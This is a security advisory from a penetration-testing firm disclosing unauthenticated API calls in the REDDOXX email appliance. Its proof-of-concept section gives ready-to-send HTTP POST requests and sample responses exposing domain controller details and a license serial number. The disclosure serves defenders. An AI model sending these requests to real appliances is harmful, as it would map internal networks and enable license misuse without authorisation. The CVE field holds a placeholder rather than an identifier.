Share
Advisory: Information Disclosure in REDDOXX Appliance  
  
RedTeam Pentesting discovered an Information Disclosure vulnerability in  
the REDDOXX appliance software, which allows unauthenticated attackers  
to gain information about the internal network the appliance is part of.  
  
  
Details  
=======  
  
Product: REDDOXX Appliance  
Affected Versions: 2032-SP2 up to hotfix 51  
Fixed Versions: 2032-SP2 hotfix 53  
Vulnerability Type: Information Disclosure  
Security Risk: low  
Vendor URL: https://www.reddoxx.com/  
Vendor Status: patch available  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-012  
Advisory Status: published  
CVE: GENERIC-MAP-NOMATCH  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH  
  
  
Introduction  
============  
  
"REDDOXX is a leading supplier of solutions for e-mail archiving,  
encrypted and digitally signed e-mail traffic as well as spam  
protection. Our focus is on technological innovation: taking our cue  
from our clients’ requirements our competent and quality-conscious  
employees strive to offer you the best possible products at all times.  
Using stringent quality standards and proven processes we keep  
developing our company and products continuously, with the goal of  
continuous improvement."  
  
(from the vendor's homepage)  
  
  
More Details  
============  
  
Through the ISO provided on the vendor's homepage [1], it was possible  
to analyze the files in a typical REDDOXX appliance [0] installation. It  
was discovered that the API functions "CoreService.GetRealmList" and  
"CoreService.GetLicense" are available without requiring authentication.  
This allows attackers to get information about the configured  
authentication mechanisms, for example Windows domain controllers if  
Active Directory authentication is in use. Additionally, the REDDOXX  
license serial number can be extracted.  
  
  
Proof of Concept  
================  
  
All functions of this API require a parameter "id" with a UUID. For  
this, the UUID provided by the system itself when using the login form  
can be used, but any valid UUID will be accepted. The  
"CoreService.GetRealmList" API function can be used as follows:  
  
------------------------------------------------------------------------  
POST /RdxEngine/json HTTP/1.1  
Host: reddoxx.example.com  
Content-Type: application/json  
  
{"id":"{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}","method":"CoreService.GetRealmList","params":{"Directory": "/etc/"}}  
------------------------------------------------------------------------  
  
It provides details about the authentication realms, such as hostname and  
port of the authentication server or the BaseDN for Active Directory/LDAP  
authentication:  
  
------------------------------------------------------------------------  
{  
"version": "1.1",  
"id": "{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}",  
"result": {  
"RealmList": [  
{  
"AuthServer": "",  
"AuthType": "local",  
"BaseDN": "",  
"DisableSavePassword": false,  
"ImportAddresses": false,  
"Name": "local",  
"SetPrimaryAddress": false,  
"TcpPort": "0",  
"UseTLS": false,  
"WindowsDomain": ""  
},  
{  
"AuthServer": "dc1.example.com",  
"AuthType": "Windows 2003",  
"BaseDN": "DC=example,DC=com",  
"DisableSavePassword": false,  
"ImportAddresses": true,  
"Name": "example.com",  
"SetPrimaryAddress": true,  
"TcpPort": "389",  
"UseTLS": false,  
"WindowsDomain": "example.com"  
},  
{  
"AuthServer": "dc2.example.com",  
"AuthType": "Windows 2003",  
"BaseDN": "DC=example,DC=net",  
"DisableSavePassword": false,  
"ImportAddresses": true,  
"Name": "example.com",  
"SetPrimaryAddress": true,  
"TcpPort": "389",  
"UseTLS": false,  
"WindowsDomain": "example.com"  
}  
]  
}  
}  
------------------------------------------------------------------------  
  
  
The "CoreService.GetLicense" API call can be used as follows:  
  
------------------------------------------------------------------------  
POST /RdxEngine/json HTTP/1.1  
Host: reddoxx.example.com  
Content-Type: application/json  
  
{"id":"{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}","method":"CoreService.GetLicense","params":{}}  
------------------------------------------------------------------------  
  
It provides details about the used license (serial number replaced by  
random value for demonstration purposes):  
  
------------------------------------------------------------------------  
{  
"version": "1.1",  
"id": "{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}",  
"result": {  
"License": {  
"Activated": true,  
"ActivationDate": "2000-01-01T12:34:56",  
"ApplianceID": "1234",  
"ArchiveLicenses": "10000",  
"Cluster": false,  
"Customer": "Example Ltd.",  
"HasFullMaildepotLicense": true,  
"HasFullSpamfinderLicense": true,  
"HasMaildepotPremiumLicense": true,  
"MailDepotImporterLicense": false,  
"MailSealerLicenses": "10000",  
"MailSealerSignatureLicense": false,  
"MsxAgentLicenses": "10000",  
"SerialNumber": "AIP1-EECA-EUKI-E6AH-OOGH-EI5Y",  
"ServiceDate": "1899-12-30T00:00:00",  
"SpamfinderLicenses": "10000",  
"SubscriptionDate": "2020-01-30T12:34:56",  
"Valid": true,  
"VirusScan": true  
}  
}  
}  
------------------------------------------------------------------------  
  
  
Workaround  
==========  
  
None  
  
  
Fix  
===  
  
Install the latest hotfixes for the appliance, see [2].  
  
  
Security Risk  
=============  
  
The risk of the information disclosure through the two API calls is  
estimated to be low. Although the API calls should not be available  
without authentication, "CoreService.GetRealmList" will only return  
rudimentary information about the authentication realms and  
"CoreService.GetLicense" is mostly a problem for the vendor, as the  
serial number could be misused to set up a licensed application without  
paying.  
  
  
Timeline  
========  
  
2019-05-21 Vulnerability identified  
2019-05-24 Customer approved disclosure to vendor  
2019-06-04 Vendor notified  
2019-06-05 Vendor acknowledges the vulnerability  
2019-06-17 Vendor released hotfix  
2019-06-24 Customer approved release  
2019-07-01 Advisory released  
  
  
References  
==========  
  
[0] https://www.reddoxx.com/en/  
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads  
(Requires login)  
[2] https://appliance.docs.reddoxx.com/de/release-notes/release-notes-version-2032-service-pack-2-2-2-1242  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests performed by a  
team of specialised IT-security experts. Hereby, security weaknesses in  
company networks or products are uncovered and can be fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security-related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at:  
https://www.redteam-pentesting.de/  
  
  
Working at RedTeam Pentesting  
=============================  
  
RedTeam Pentesting is looking for penetration testers to join our team  
in Aachen, Germany. If you are interested please visit:  
https://www.redteam-pentesting.de/jobs/  
  
  
--   
RedTeam Pentesting GmbH Tel.: +49 241 510081-0  
Dennewartstr. 25-27 Fax : +49 241 510081-99  
52068 Aachen https://www.redteam-pentesting.de  
Germany Registergericht: Aachen HRB 14004  
Geschäftsführer: Patrick Hof, Jens Liebchen